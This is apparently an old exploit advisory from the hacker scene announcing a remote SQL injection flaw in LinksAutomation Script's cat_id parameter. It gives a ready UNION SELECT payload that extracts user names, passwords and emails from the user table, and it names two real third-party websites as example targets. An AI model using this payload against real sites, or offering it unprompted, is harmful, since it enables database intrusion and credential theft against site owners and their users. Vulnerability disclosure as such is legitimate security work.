LinksAutomation Script suffers from a remote SQL injection vulnerability.
52eca462044051c914f3bd91e80412422c5a19379cf39af95385d1bb7a82f16f
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] LinksAutomation Script (links.php?cat_id) and
(LinksAutomation.php?cat_id) Remote SQL Injection Vulnerability
[~]
[~] http://www.linksautomation.com
[~]
[~]
[~]
----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 19.11.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~]
----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] packetstorm staff
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] cat_id=-1 union select
1,2,3,4,5,6,concat(fname,0x3a,password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18
from lp_user_tb/*
[~]
[~]
[~]------------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] Example :-
[~]
[~] LinksAutomation.php?cat_id ->
http://www.steal.com.au/LinksAutomation.php?cat_id=SQL
[~]
[~]
[~] links.php?cat_id= -> http://www.dozingo.com/links.php?cat_id=SQL
[~]
[~]
[~]-------------------------------------------------------------------------------------------------------------------------------------------------------